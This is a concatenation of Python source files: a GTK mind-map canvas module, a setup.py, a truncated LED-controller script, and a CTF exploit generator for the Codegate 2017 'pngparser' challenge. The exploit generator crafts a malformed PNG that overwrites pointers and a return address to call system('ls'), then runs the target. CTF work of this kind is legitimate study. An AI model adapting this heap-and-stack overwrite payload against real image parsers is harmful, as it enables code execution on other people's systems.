self.undo_transform_cb,
scale, self.scale_fac, self.translation,
self.translation))
self.invalidate()
def undo_joint_cb (self, action, mode):
delete = action.args[0]
create = action.args[1]
if mode == UndoManager.UNDO:
self.undo_create_cb (create, mode)
self.undo_deletion (delete, mode)
else:
self.undo_deletion (delete, mode)
self.undo_create_cb (create, mode)
self.invalidate ()
def key_press (self, widget, event):
# Support for canvas panning keys ('hand' on XO, 'cmd' on Macs)
if event.hardware_keycode == 133 or event.hardware_keycode == 134:
self.translate = True
if not self.do_filter or not self.im_context.filter_keypress (event):
if self.focus:
if self.focus.creating or \
not self.focus.process_key_press (event, self.mode):
return self.global_key_handler (event)
return True
if len(self.selected) != 1 or not self.selected[0].process_key_press (event, self.mode):
return self.global_key_handler (event)
return True
def key_release (self, widget, event):
# Support for canvas panning keys ('hand' on XO, 'cmd' on Macs)
if event.hardware_keycode == 133 or event.hardware_keycode == 134:
self.translate = False
self.im_context.filter_keypress (event)
return True
def motion (self, widget, event):
if self._dragging:
if self.origin_x is None:
self.origin_x = event.get_coords()[0]
self.origin_y = event.get_coords()[1]
dx = self.origin_x - event.get_coords()[0]
dy = self.origin_y - event.get_coords()[1]
self.origin_x = event.get_coords()[0]
self.origin_y = event.get_coords()[1]
self._adjust_sw(dx, dy)
return True
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
if event.get_state() & Gdk.ModifierType.BUTTON1_MASK and self.is_bbox_selecting:
self.bbox_current = coords
self.invalidate()
ul = [ self.bbox_origin[0], self.bbox_origin[1] ]
lr = [ coords[0], coords[1] ]
if self.bbox_origin[0] > coords[0]:
if self.bbox_origin[1] < coords[1]:
ul[0] = coords[0]
ul[1] = self.bbox_origin[1]
lr[0] = self.bbox_origin[0]
lr[1] = coords[1]
else:
ul = coords
lr = self.bbox_origin
elif self.bbox_origin[1] > coords[1]:
ul[0] = self.bbox_origin[0]
ul[1] = coords[1]
lr[0] = coords[0]
lr[1] = self.bbox_origin[1]
# FIXME: O(n) runtime is bad
for t in self.thoughts:
if t.lr[0] > ul[0] and t.ul[1] < lr[1] and t.ul[0] < lr[0] and t.lr[1] > ul[1] :
if t not in self.selected:
self.select_thought(t, Gdk.ModifierType.SHIFT_MASK)
else:
if t in self.selected:
t.unselect()
self.selected.remove(t)
return True
elif self.moving:
self.set_cursor(Gdk.FLEUR)
if not self.move_action:
self.move_action = UndoManager.UndoAction (self, UNDO_MOVE, self.undo_move, self.move_origin,
self.selected)
for t in self.selected:
t.move_by (coords[0] - self.move_origin_new[0], coords[1] - self.move_origin_new[1])
self.move_origin_new = (coords[0], coords[1])
self.invalidate ()
return True
elif event.get_state() & Gdk.ModifierType.BUTTON2_MASK or \
event.get_state() & Gdk.ModifierType.BUTTON1_MASK and self.translate:
self.translate = True
self.translation[0] -= (self.origin_x - event.x) / self.scale_fac
self.translation[1] -= (self.origin_y - event.y) / self.scale_fac
self.origin_x = event.x
self.origin_y = event.y
self.invalidate()
return True
obj = self.find_object_at (coords)
if obj and obj.handle_motion(event, coords):
self.update_links_cb(obj)
self.update_view(obj)
return True
def find_object_at (self, coords):
if self.focus and self.focus.includes(coords):
return self.focus
for x in reversed(self.thoughts):
if x != self.focus and not isinstance(x, Link) and x.includes (coords):
return x
for x in self.links:
if x != self.focus and not isinstance(x, Link) and x.includes (coords):
return x
return None
def realize_cb (self, widget):
self.disconnect (self.realize_handle)
if self.mode == MODE_IMAGE or self.mode == MODE_DRAW:
self.set_cursor (Gdk.CursorType.CROSSHAIR)
else:
self.set_cursor (Gdk.CursorType.LEFT_PTR)
return False
def set_cursor(self, kind):
new_cursor = CursorFactory().get_cursor(kind)
if self.current_cursor != new_cursor:
self.current_cursor = new_cursor
self.window.set_cursor(self.current_cursor)
def set_mode (self, mode):
if mode == self.mode:
return
self.old_mode = self.mode
self.mode = mode
self.hookup_im_context ()
if self.window:
if mode == MODE_IMAGE or mode == MODE_DRAW:
self.set_cursor (Gdk.CursorType.CROSSHAIR)
else:
self.set_cursor (Gdk.CursorType.LEFT_PTR)
else:
self.realize_handle = self.connect ("realize", self.realize_cb)
self.mode = mode
if self.window:
self.invalidate ()
def title_changed_cb (self, widget, new_title):
self.emit ("title_changed", new_title)
def make_primary (self, thought):
if self.primary:
print "Warning: Already have a primary root"
if self.title_change_handler:
self.primary.disconnect (self.title_change_handler)
self.title_change_handler = thought.connect ("title_changed", self.title_changed_cb)
self.emit ("title_changed", thought.text)
self.primary = thought
thought.make_primary ()
def hookup_im_context (self, thought = None):
if self.commit_handler:
self.im_context.disconnect (self.commit_handler)
self.im_context.disconnect (self.delete_handler)
self.im_context.disconnect (self.preedit_changed_handler)
self.im_context.disconnect (self.preedit_end_handler)
self.im_context.disconnect (self.preedit_start_handler)
self.im_context.disconnect (self.retrieve_handler)
self.commit_handler = None
if thought:
try:
self.commit_handler = self.im_context.connect ("commit", thought.commit_text, self.mode, None, None)
# self.font_combo_box, self.font_sizes_combo_box)
self.delete_handler = self.im_context.connect ("delete-surrounding", thought.delete_surroundings, self.mode)
self.preedit_changed_handler = self.im_context.connect ("preedit-changed", thought.preedit_changed, self.mode)
self.preedit_end_handler = self.im_context.connect ("preedit-end", thought.preedit_end, self.mode)
self.preedit_start_handler = self.im_context.connect ("preedit-start", thought.preedit_start, self.mode)
self.retrieve_handler = self.im_context.connect ("retrieve-surrounding", thought.retrieve_surroundings, \
self.mode)
self.do_filter = True
except AttributeError:
self.do_filter = False
else:
self.do_filter = False
def unselect_all (self):
self.hookup_im_context ()
for t in self.selected:
t.unselect ()
self.selected = []
def select_link (self, link, modifiers):
if modifiers and modifiers & Gdk.ModifierType.SHIFT_MASK and len (self.selected) > 1 and self.selected.count (link) > 0:
self.selected.remove (link)
link.unselect ()
return
self.hookup_im_context()
self.set_focus(None, None)
if modifiers and (modifiers & Gdk.ModifierType.SHIFT_MASK or modifiers == -1):
if self.selected.count (link) == 0:
self.selected.append (link)
else:
map (lambda t : t.unselect(), self.selected)
self.selected = [link]
link.select()
self.emit("change_buffer", None)
def set_focus(self, thought, modifiers):
if self.focus == thought:
return
if self.focus:
self.focus.leave()
if thought:
self.select_thought(thought, modifiers)
self.focus = thought
def select_thought (self, thought, modifiers):
self.hookup_im_context ()
if thought in self.selected and self.moving:
return
if thought not in self.thoughts:
self.thoughts.append(thought)
if modifiers and (modifiers & Gdk.ModifierType.SHIFT_MASK or modifiers == -1):
if self.selected.count (thought) == 0:
self.selected.append (thought)
else:
map(lambda x : x.unselect(), self.selected)
self.selected = [thought]
if thought.can_be_parent():
self.current_root = []
for x in self.selected:
if x.can_be_parent():
self.current_root.append(x)
thought.select ()
if len(self.selected) == 1:
self.emit ("thought_selection_changed", thought.background_color, thought.foreground_color)
self.background_color = thought.background_color
self.foreground_color = thought.foreground_color
try:
self.emit ("change_buffer", thought.extended_buffer)
except AttributeError:
self.emit ("change_buffer", None)
self.hookup_im_context (thought)
else:
self.emit ("change_buffer", None)
def undo_link_action (self, action, mode):
self.undo.block ()
self.set_focus(None, None)
link = action.args[0]
if action.undo_type == UNDO_CREATE_LINK:
if mode == UndoManager.REDO:
self.element.appendChild (link.element)
self.links.append (link)
else:
self.delete_link (link)
elif action.undo_type == UNDO_DELETE_LINK:
if mode == UndoManager.UNDO:
self.element.appendChild (link.element)
self.links.append (link)
else:
self.delete_link (link)
elif action.undo_type == UNDO_STRENGTHEN_LINK:
if mode == UndoManager.UNDO:
link.set_strength (action.args[1])
else:
link.set_strength (action.args[2])
self.undo.unblock ()
self.invalidate ()
def connect_link (self, link):
link.connect ("select_link", self.select_link)
link.connect ("update_view", self.update_view)
def create_link (self, thought, thought_coords, child, child_coords = None, strength = 2):
for x in self.links:
if x.connects (thought, child):
if x.change_strength (thought, child):
self.delete_link (x)
return
link = Link (self.save, parent = thought, child = child, strength = strength)
self.connect_link (link)
element = link.get_save_element ()
self.element.appendChild (element)
self.links.append (link)
return link
def set_mouse_cursor_cb (self, thought, cursor_type):
if not self.moving:
self.set_cursor (cursor_type)
def update_all_links(self):
map(lambda l : l.find_ends(), self.links)
def update_links_cb (self, thought):
for x in self.links:
if x.uses (thought):
x.find_ends ()
def update_view (self, thought):
self.invalidate ()
def invalidate (self, transformed_area = None):
'''Helper function to invalidate the entire screen, forcing a redraw'''
rect = None
if not transformed_area:
alloc = self.get_allocation ()
rect = (0, 0, alloc.width, alloc.height)
else:
ul = self.untransform_coords(transformed_area[0], transformed_area[1])
lr = self.untransform_coords(transformed_area[2], transformed_area[3])
rect = (int(ul[0]), int(ul[1]), int(lr[0]-ul[0]), int(lr[1]-ul[1]))
if self.window:
self.window.invalidate_rect (rect, True)
def expose (self, widget, event):
'''Expose event. Calls the draw function'''
context = self.window.cairo_create ()
self.draw (event, context)
return False
def draw (self, event, context):
'''Draw the map and all the associated thoughts'''
area = event.area
context.rectangle (area.x, area.y, area.width, area.height)
context.clip ()
context.set_source_rgb (1.0,1.0,1.0)
context.move_to (area.x, area.y)
context.paint ()
context.set_source_rgb (0.0,0.0,0.0)
alloc = self.get_allocation ()
context.translate(alloc.width/2., alloc.height/2.)
context.scale(self.scale_fac, self.scale_fac)
context.translate(-alloc.width/2., -alloc.height/2.)
context.translate(self.translation[0], self.translation[1])
for l in self.links:
l.draw (context)
self.untransform = context.get_matrix()
self.transform = context.get_matrix()
self.transform.invert()
ax, ay = self.transform_coords(area.x, area.y)
width = area.width / self.scale_fac
height = area.height / self.scale_fac
for t in self.thoughts:
try:
if t.lr[0] >= ax and t.ul[0] <= ax + width and t.lr[1] >= ay and t.ul[1] <= ay + height:
t.draw (context)
except:
t.draw(context)
if self.is_bbox_selecting:
xs = self.bbox_origin[0]
ys = self.bbox_origin[1]
xe = self.bbox_current[0] - xs
ye = self.bbox_current[1] - ys
xs,ys = context.user_to_device(xs, ys)
xe,ye = context.user_to_device_distance(xe, ye)
xs = int(xs) + 0.5
ys = int(ys) + 0.5
xe = int(xe)
ye = int(ye)
xs,ys = context.device_to_user(xs, ys)
xe,ye = context.device_to_user_distance(xe, ye)
color = utils.selected_colors["border"]
context.set_line_width(2.0)
context.set_source_rgb(color[0], color[1], color[2])
context.rectangle(xs, ys, xe, ye)
context.stroke()
#color = utils.selected_colors["fill"]
#context.set_source_rgba(color[0], color[1], color[2], 0.3)
#context.rectangle(xs, ys, xe, ye)
#context.fill()
#context.set_line_width(2.0)
#context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
def undo_create_cb (self, action, mode):
self.undo.block ()
if mode == UndoManager.UNDO:
self.unselect_all ()
for t in action.args[1]:
self.select_thought (t, -1)
self.delete_thought (action.args[0])
self.emit ("change_mode", action.args[3])
else:
self.emit ("change_mode", action.args[2])
thought = action.args[0]
self.thoughts.append (thought)
for t in action.args[1]:
self.unselect_all ()
self.select_thought (t, -1)
self.hookup_im_context (thought)
self.emit ("change_buffer", thought.extended_buffer)
self.element.appendChild (thought.element)
for l in action.args[5:]:
self.links.append (l)
self.element.appendChild (l.element)
self.emit ("set_focus", None, False)
self.undo.unblock ()
self.invalidate ()
def create_new_thought (self, coords, type = None, loading = False):
self.set_focus(None, None)
if not type:
type = self.mode
if type == MODE_TEXT:
# fixed<-_vbox<-_sw<-_main_area
thought = TextThought.TextThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color, fixed=self.parent.parent.parent.parent, parent=self)
elif type == MODE_LABEL:
thought = LabelThought.LabelThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color)
elif type == MODE_IMAGE:
thought = ImageThought.ImageThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color)
elif type == MODE_DRAW:
thought = DrawingThought.DrawingThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, \
loading,self.background_color, self.foreground_color)
elif type == MODE_RESOURCE:
thought = ResourceThought.ResourceThought (coords, self.pango_context, self.nthoughts, self.save, self.undo, loading, self.background_color, self.foreground_color)
if not thought.okay ():
return None
if type == MODE_IMAGE:
self.emit ("change_mode", self.old_mode)
self.nthoughts += 1
element = thought.element
self.element.appendChild (thought.element)
thought.connect ("select_thought", self.select_thought)
thought.connect ("create_link", self.create_link)
thought.connect ("update_view", self.update_view)
thought.connect ("text_selection_changed", self.text_selection_cb)
thought.connect ("change_mouse_cursor", self.set_mouse_cursor_cb)
thought.connect ("update_links", self.update_links_cb)
thought.connect ("grab_focus", self.regain_focus_cb)
thought.connect ("update-attrs", self.update_attr_cb)
self.thoughts.append (thought)
return thought
def regain_focus_cb (self, thought, ext):
self.emit ("set_focus", None, ext)
def update_attr_cb (self, widget, bold, italics, underline, pango_font):
self.emit ("set_attrs", bold, italics, underline, pango_font)
def delete_thought (self, thought, undo = True):
if undo:
action = UndoManager.UndoAction (self, UNDO_DELETE_SINGLE, self.undo_deletion, [thought])
else:
action = None
if hasattr(thought, 'textview'):
thought.remove_textview()
if thought.element in self.element.childNodes:
self.element.removeChild (thought.element)
self.thoughts.remove (thought)
try:
self.selected.remove (thought)
except:
pass
if self.focus == thought:
self.hookup_im_context ()
self.focus = None
if self.primary == thought:
thought.disconnect (self.title_change_handler)
self.title_change_handler = None
self.primary = None
if self.thoughts:
self.make_primary (self.thoughts[0])
rem_links = []
for l in self.links:
if l.uses (thought):
if action: action.add_arg (l)
rem_links.append (l)
for l in rem_links:
self.delete_link (l)
for i, obj in enumerate(self.current_root):
if obj == thought:
del self.current_root[i]
break
if action:
self.undo.add_undo (action)
return True
def undo_deletion (self, action, mode):
self.undo.block ()
if mode == UndoManager.UNDO:
self.unselect_all ()
for l in action.args[1:]:
self.links.append (l)
self.element.appendChild (l.element)
for t in action.args[0]:
self.thoughts.append (t)
self.select_thought (t, -1)
self.element.appendChild (t.element)
if t.am_primary and not self.primary:
self.emit ("change_buffer", action.args[0][0].extended_buffer)
self.make_primary(t)
else:
for t in action.args[0]:
self.delete_thought (t, False)
for l in action.args[1:]:
self.delete_link (l)
self.emit ("set_focus", None, False)
self.undo.unblock ()
self.invalidate ()
def delete_selected_elements (self):
if len(self.selected) == 0:
return
action = UndoManager.UndoAction (self, UNDO_DELETE, self.undo_deletion, copy.copy(self.selected))
try:
# delete_thought as a callback adds it's own undo action. Block that here
self.undo.block ()
tmp = self.selected
t = tmp.pop()
while t:
if t in self.thoughts:
for l in self.links:
if l.uses (t):
action.add_arg (l)
self.delete_thought (t)
if t in self.links:
self.delete_link (t)
if len (tmp) == 0:
t = None
else:
t = tmp.pop()
finally:
self.undo.unblock ()
self.undo.add_undo (action)
self.invalidate ()
def delete_link (self, link):
if link.element in self.element.childNodes:
self.element.removeChild (link.element)
#link.element.unlink ()
try:
self.links.remove (link)
except:
pass
def find_related_thought (self, radians):
# Find thought within angle
best = None
bestangle = 1000.
bestdist = 10000.
def do_find (one, two, currentangle, curdist, sensitivity):
init_x = (one.ul[0] + one.lr[0]) / 2.
init_y = (one.ul[1] + one.lr[1]) / 2.
other_x = (two.ul[0] + two.lr[0]) / 2.
other_y = (two.ul[1] + two.lr[1]) / 2.
angle = math.atan2 ((other_y - init_y), (other_x - init_x))
while angle > math.pi:
angle -= math.pi
while angle < -math.pi:
angle += math.pi
# We have to special-case left due to stupidity of tan's
# We shift it by pi radians
if radians == RAD_LEFT:
relangle = abs((angle+math.pi) - (radians+math.pi))
if relangle > math.pi*2.:
relangle -= math.pi*2.
else:
relangle = abs(angle - radians)
newdist = math.sqrt ((init_x - other_x)**2 + (init_y - other_y)**2)
magicnum = newdist + (50. * relangle)
# Used for debugging. Spits out lots of useful info
# to determine interesting things about the thought relations
#print "angle: "+str(angle)+" rel: "+str(magicnum)+" rads: "+str(radians),
#print " , "+str(math.pi / 3.0)+" , "+str(currentangle)+"\n: "+str(relangle)
if (relangle < sensitivity) and \
(magicnum < currentangle):
return (magicnum, newdist)
return (currentangle, curdist)
if len(self.selected) != 1:
return None
initial = self.selected[0]
for x in self.links:
if x.parent == initial:
other = x.get_child()
elif x.get_child() == initial:
other = x.parent
else:
continue
(curr, dist) = do_find (initial, other, bestangle, bestdist, math.pi/3.)
if curr < bestangle:
bestangle = curr
best = other
bestdist = dist
if not best:
for x in self.thoughts:
if x == self.selected[0]:
continue
(curr, dist) = do_find (initial, x, bestangle, bestdist, math.pi/4.)
if curr < bestangle:
best = x
bestangle = curr
bestdist = dist
return best
def undo_align(self, action, mode):
self.undo.block ()
dic = action.args[0]
if mode == UndoManager.UNDO:
for t in dic:
t.move_by(-dic[t][0], -dic[t][1])
else:
for t in dic:
t.move_by(dic[t][0], dic[t][1])
self.undo.unblock ()
def align_top_left(self, vertical=True):
dic = {}
if len(self.selected) != 0:
x = self.selected[0].ul[0]
y = self.selected[0].ul[1]
for t in self.selected:
if vertical:
vec = (-(t.ul[0]-x), 0)
else:
vec = (0, -(t.ul[1]-y))
t.move_by(vec[0], vec[1])
dic[t] = vec
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_ALIGN, self.undo_align, dic))
def align_bottom_right(self, vertical=True):
dic = {}
if len(self.selected) != 0:
x = self.selected[0].lr[0]
y = self.selected[0].lr[1]
for t in self.selected:
if vertical:
vec = (-(t.lr[0]-x), 0)
else:
vec = (0, -(t.lr[1]-y))
t.move_by(vec[0], vec[1])
dic[t] = vec
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_ALIGN, self.undo_align, dic))
def align_centered(self, vertical=True):
dic = {}
if len(self.selected) != 0:
x = self.selected[0].ul[0] + (self.selected[0].lr[0] - self.selected[0].ul[0]) / 2.0
y = self.selected[0].ul[1] + (self.selected[0].lr[1] - self.selected[0].ul[1]) / 2.0
for t in self.selected:
if vertical:
vec = (-((t.ul[0] + (t.lr[0]-t.ul[0])/2.0)-x), 0)
else:
vec = (0, -((t.ul[1] + (t.lr[1]-t.ul[1])/2.0)-y))
t.move_by(vec[0], vec[1])
dic[t] = vec
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_ALIGN, self.undo_align, dic))
def global_key_handler (self, event):
thought = None
if event.keyval == Gdk.KEY_Up:
thought = self.find_related_thought (RAD_UP)
elif event.keyval == Gdk.KEY_Down:
thought = self.find_related_thought (RAD_DOWN)
elif event.keyval == Gdk.KEY_Left:
thought = self.find_related_thought (RAD_LEFT)
elif event.keyval == Gdk.KEY_Right:
thought = self.find_related_thought (RAD_RIGHT)
elif event.keyval == Gdk.KEY_Delete:
self.delete_selected_elements ()
elif event.keyval == Gdk.KEY_BackSpace:
self.delete_selected_elements ()
elif event.keyval == Gdk.KEY_Return:
if self.focus:
self.focus.enter()
elif event.keyval == Gdk.KEY_Escape:
if self.focus and self.focus.creating:
self.undo.forget_action()
self.unselect_all ()
self.focus = None
elif event.keyval == Gdk.KEY_a and event.get_state() & Gdk.ModifierType.CONTROL_MASK:
self.unselect_all ()
for t in self.thoughts:
t.select ()
self.selected.append (t)
else:
return False
if thought:
self.set_focus(thought, None)
self.invalidate ()
return True
def load_thought (self, node, type, tar):
thought = self.create_new_thought (None, type, loading = True)
thought.creating = False
thought.load (node, tar)
def load_link (self, node):
link = Link (self.save)
self.connect_link (link)
link.load (node)
self.links.append (link)
element = link.get_save_element ()
self.element.appendChild (element)
def load_thyself (self, top_element, doc, tar):
for node in top_element.childNodes:
if node.nodeName == "thought":
self.load_thought (node, MODE_TEXT, tar)
elif node.nodeName == "label_thought":
self.load_thought (node, MODE_LABEL, tar)
elif node.nodeName == "image_thought":
self.load_thought (node, MODE_IMAGE, tar)
elif node.nodeName == "drawing_thought":
self.load_thought (node, MODE_DRAW, tar)
elif node.nodeName == "res_thought":
self.load_thought (node, MODE_RESOURCE, tar)
elif node.nodeName == "link":
self.load_link (node)
else:
print "Warning: Unknown element type. Ignoring: "+node.nodeName
self.finish_loading ()
def finish_loading (self):
# Possible TODO: This all assumes we've been given a proper,
# consistant file. It should fallback nicely, but...
# First, find the primary root:
for t in self.thoughts:
if t.am_primary:
self.make_primary (t)
if t.am_selected:
self.selected.append (t)
t.select ()
if t.identity >= self.nthoughts:
self.nthoughts = t.identity + 1
if self.selected:
self.current_root = self.selected
else:
self.current_root = [self.primary]
if len(self.selected) == 1:
self.emit ("change_buffer", self.selected[0].extended_buffer)
self.hookup_im_context (self.selected[0])
self.emit ("thought_selection_changed", self.selected[0].background_color, \
self.selected[0].foreground_color)
else:
self.emit ("change_buffer", None)
del_links = []
for l in self.links:
if (l.parent_number == -1 and l.child_number == -1) or \
(l.parent_number == l.child_number):
del_links.append (l)
continue
parent = child = None
for t in self.thoughts:
if t.identity == l.parent_number:
parent = t
elif t.identity == l.child_number:
child = t
if parent and child:
break
l.set_parent_child (parent, child)
if not l.parent or not l.get_child():
del_links.append (l)
for l in del_links:
self.delete_link (l)
def update_save(self):
for t in self.thoughts:
t.update_save ()
for l in self.links:
l.update_save ()
def save_thyself(self, tar):
for t in self.thoughts:
t.save(tar)
def text_selection_cb (self, thought, start, end, text):
self.emit ("text_selection_changed", start, end, text)
def copy_clipboard (self, clip):
if len (self.selected) != 1:
return
self.selected[0].copy_text (clip)
def cut_clipboard (self, clip):
if len (self.selected) != 1:
return
self.selected[0].cut_text (clip)
def paste_clipboard (self, clip):
if len (self.selected) != 1:
return
self.selected[0].paste_text (clip)
def export (self, context, width, height, native):
context.rectangle (0, 0, width, height)
context.clip ()
context.set_source_rgb (1.0,1.0,1.0)
context.move_to (0,0)
context.paint ()
context.set_source_rgb (0.0,0.0,0.0)
if not native:
move_x = self.move_x
move_y = self.move_y
else:
move_x = 0
move_y = 0
for l in self.links:
l.export (context, move_x, move_y)
for t in self.thoughts:
t.export (context, move_x, move_y)
def get_max_area (self):
minx = 999
maxx = -999
miny = 999
maxy = -999
for t in self.thoughts:
mx,my,mmx,mmy = t.get_max_area ()
if mx < minx:
minx = mx
if my < miny:
miny = my
if mmx > maxx:
maxx = mmx
if mmy > maxy:
maxy = mmy
# Add a 10px border around all
self.move_x = 10-minx
self.move_y = 10-miny
maxx = maxx-minx+20
maxy = maxy-miny+20
return (maxx,maxy)
def get_selection_bounds (self):
if len (self.selected) == 1:
try:
return self.selected[0].index, self.selected[0].end_index
except AttributeError:
return None, None
else:
return None, None
def thoughts_are_linked (self):
if len (self.selected) != 2:
return False
for l in self.links:
if l.connects (self.selected[0], self.selected[1]):
return True
return False
def drag_menu_cb(self, sw, mode):
if len(self.selected) == 1:
if hasattr(self.selected[0], 'textview'):
self.selected[0].remove_textview()
if mode == True:
self.sw = sw
self.drag_mode = True
else:
self.drag_mode = False
def is_dragging(self):
return self.drag_mode
def _adjust_sw(self, dx, dy):
if self.sw is None:
return
if not self.drag_mode:
return
hadj = self.sw.get_hadjustment()
hvalue = hadj.get_value() + dx
try:
if hvalue < hadj.get_lower():
hvalue = hadj.get_lower()
elif hvalue > hadj.get_upper():
hvalue = hadj.get_upper()
except AttributeError:
pass
hadj.set_value(hvalue)
self.sw.set_hadjustment(hadj)
vadj = self.sw.get_vadjustment()
vvalue = vadj.get_value() + dy
try:
if vvalue < vadj.get_lower():
vvalue = vadj.get_lower()
elif vvalue > vadj.get_upper():
vvalue = vadj.get_upper()
except AttributeError:
pass
vadj.set_value(vvalue)
self.sw.set_vadjustment(vadj)
def stop_moving(self):
self.moving = False
self.move_mode = False
self.move_origin = None
def start_moving(self, move_button):
if len(self.selected) == 1:
if hasattr(self.selected[0], 'textview'):
self.selected[0].remove_textview()
self.move_mode = True
self.move_button = move_button
def link_menu_cb (self):
if len (self.selected) != 2:
return
if not self.selected[0].can_be_parent() or \
not self.selected[1].can_be_parent():
return
lnk = None
for l in self.links:
if l.connects (self.selected[0], self.selected[1]):
lnk = l
break
if lnk:
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_DELETE_LINK, self.undo_link_action, lnk))
self.delete_link (lnk)
else:
lnk = self.create_link (self.selected[0], None, self.selected[1])
self.undo.add_undo (UndoManager.UndoAction (self, UNDO_CREATE_LINK, self.undo_link_action, lnk))
self.invalidate ()
def set_bold (self, active):
if len(self.selected) != 1:
return
self.selected[0].set_bold (active)
self.invalidate()
def set_italics (self, active):
if len(self.selected) != 1:
return
self.selected[0].set_italics (active)
self.invalidate()
def set_underline (self, active):
if len(self.selected) != 1:
return
self.selected[0].set_underline (active)
self.invalidate()
def set_background_color(self, color):
for s in self.selected:
s.background_color = color
self.background_color = color
if len(self.selected) > 1:
self.invalidate()
def set_foreground_color(self, color):
for s in self.selected:
s.foreground_color = color
self.foreground_color = color
if len(self.selected) > 1:
self.invalidate()
def set_font(self, font_name, font_size):
if len (self.selected) == 1 and hasattr(self.selected[0], "set_font"):
self.selected[0].set_font(font_name, font_size)
self.font_name = font_name
self.font_size = font_size
self.invalidate()
def embody_thought(self, event):
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
thought = self.create_new_thought(coords)
sel = self.selected
if not thought:
return True
if not self.primary and \
thought.can_be_parent():
self.make_primary (thought)
self.select_thought (thought, None)
else:
self.emit ("change_buffer", thought.extended_buffer)
self.hookup_im_context (thought)
# Creating links adds an undo action. Block it here
self.undo.block ()
if not self.current_root:
self.current_root.append(self.primary)
if thought.can_be_parent():
for x in self.current_root:
if x.can_be_parent():
self.create_link (x, None, thought)
for x in self.selected:
x.unselect ()
self.selected = [thought]
thought.select ()
self.undo.unblock ()
thought.foreground_color = self.foreground_color
thought.background_color = self.background_color
act = UndoManager.UndoAction (self, UNDO_CREATE, self.undo_create_cb, thought, sel, \
self.mode, self.old_mode, event.get_coords())
for l in self.links:
if l.uses (thought):
act.add_arg (l)
"""
if self.undo.peak ().undo_type == UNDO_DELETE_SINGLE:
last_action = self.undo.pop ()
action = UndoManager.UndoAction (self, UNDO_COMBINE_DELETE_NEW, self.undo_joint_cb, \
last_action, act)
self.undo.add_undo (action)
else:
"""
self.undo.add_undo (act)
thought.enter()
thought.includes(coords)
event.button = 1
thought.process_button_down(event, coords)
self.focus = thought
class CursorFactory:
__shared_state = {"cursors": {}}
def __init__(self):
self.__dict__ = self.__shared_state
def get_cursor(self, cur_type):
if not self.cursors.has_key(cur_type):
cur = Gdk.Cursor.new(cur_type)
self.cursors[cur_type] = cur
return self.cursors[cur_type]
|
Boquete/activity-labyrinth
|
src/MMapArea.py
|
Python
|
gpl-2.0
| 43,202
|
from distutils.core import setup
setup(
name='CoPing',
version='0.1.4',
packages=['CoPing'],
url='https://github.com/joedborg/PyPing',
scripts=['CoPing/coping'],
license='GPLv2',
author='Joe Borg',
author_email='mail@jdborg.com',
description='A Cisco style ping tool'
)
|
joedborg/CoPing
|
setup.py
|
Python
|
gpl-2.0
| 307
|
import binascii
import os
from pwn import *
def crc32(val):
return binascii.crc32(val) & 0xffffffff
PNG_HEADER = '\x89\x50\x4e\x47\x0d\x0a\x1a\x0a'
payload = ''
# state 11
payload += PNG_HEADER
'''
IHDR Chunk
'''
# state 12
HEADER = 'IHDR'
data_len = 13
payload += p32(data_len)[::-1] + HEADER
# state 13
data = p32(1)[::-1] + p32(1)[::-1] + p8(8) + p8(0) + p8(0) + p8(0) + p8(0)
payload += data
# state 14
payload += p32(crc32(HEADER+data))[::-1]
'''
IDAT Chunk
'''
# state 12
HEADER = 'IDAT'
data_len = 0x10000 - len(payload) - 12
payload += p32(data_len)[::-1] + HEADER
# state 13
data = cyclic(data_len)
payload += data
# state 14
payload += p32(crc32(HEADER+data))[::-1]
'''
IDAT Chunk
'''
# state 12
HEADER = 'IDAT'
data_len = 0x10000 - 12
payload += p32(data_len)[::-1] + HEADER
# state 13
cycle = cyclic(data_len)
offset1 = cycle.index(p32(0x62616163))
offset2 = cycle.index(p32(0x62616162))
print offset1, offset2
ret_offset = 0x90
LOCAL = True
LIBC_BASE = 0xf7575000
SYSTEM_ADDR = 0x8048540
if LOCAL:
STDIN_ADDR = LIBC_BASE+(0xf7fa45a0-0xf7df2000)
LS_ADDR = LIBC_BASE + 0x10ed2
else:
STDIN_ADDR = 0xf77185a0
LS_ADDR = STDIN_ADDR + 0x55214
data = 'ls'.rjust(data_len, ' ')
data = data[:offset1]+p32(STDIN_ADDR)+data[offset1+4:] # feof
data = data[:offset2]+p32(0x00)+data[offset2+4:] # free
data = data[:ret_offset]+p32(SYSTEM_ADDR)+'aaaa'+p32(LS_ADDR)+data[ret_offset+12:] # ret
payload += data
# state 14
payload += p32(crc32(HEADER+data))[::-1]
'''
Broken Chunk
'''
# state 12
payload += 'die'
f = open('payload.png', 'wb')
f.write(payload)
f.close()
os.system('ltrace ./pngparser payload.png')
|
Qwaz/solved-hacking-problem
|
Codegate/2017 Quals/pngparser (unsolved)/generator.py
|
Python
|
gpl-2.0
| 1,654
|
import socket
import convox_led_pb2 as ledbuf
from time import sleep
from random import randint
UDP_IP = "192.168.1.124"
UDP_PORT = 666
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class LightFrame:
def __init__(self, colors=((255, 255, 255)), period=200000, transition_steps=200000, circle_compression=1):
self._lights = ledbuf.ConvoxLightConfig()
self._lights.period = period
self._lights.transition_steps = transition_steps
self._lights.circle_compression = circle_compression
self.set_colors(colors)
def add_color(self, coords, rgb=True):
self._lights.colors.add()
self._lights.colors[-1].color_space = int(rgb)
[self._lights.colors[-1].coordinates.append(i) for i in coords]
def set_colors(self, colors, rgb=True):
[self.add_color(coords, rgb=rgb) for coords in colors]
def __str__(self):
return self._lights.SerializeToString()
class Controller:
default_colors = [(0, 255, 0) for _ in range(9)]
def __init__(self, mode):
self.lights = LightFrame(self.default_colors)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if mode == 'disco':
for _ in range(1000):
colors = [(randint(0, 255), randint(0, 255), randint(0, 255)) for _ in range(9)]
self.send_frame(colors)
sleep(0.3)
else:
self.send_frame(self.default_colors)
def send_frame(self, colors):
self.lights = LightFrame(colors)
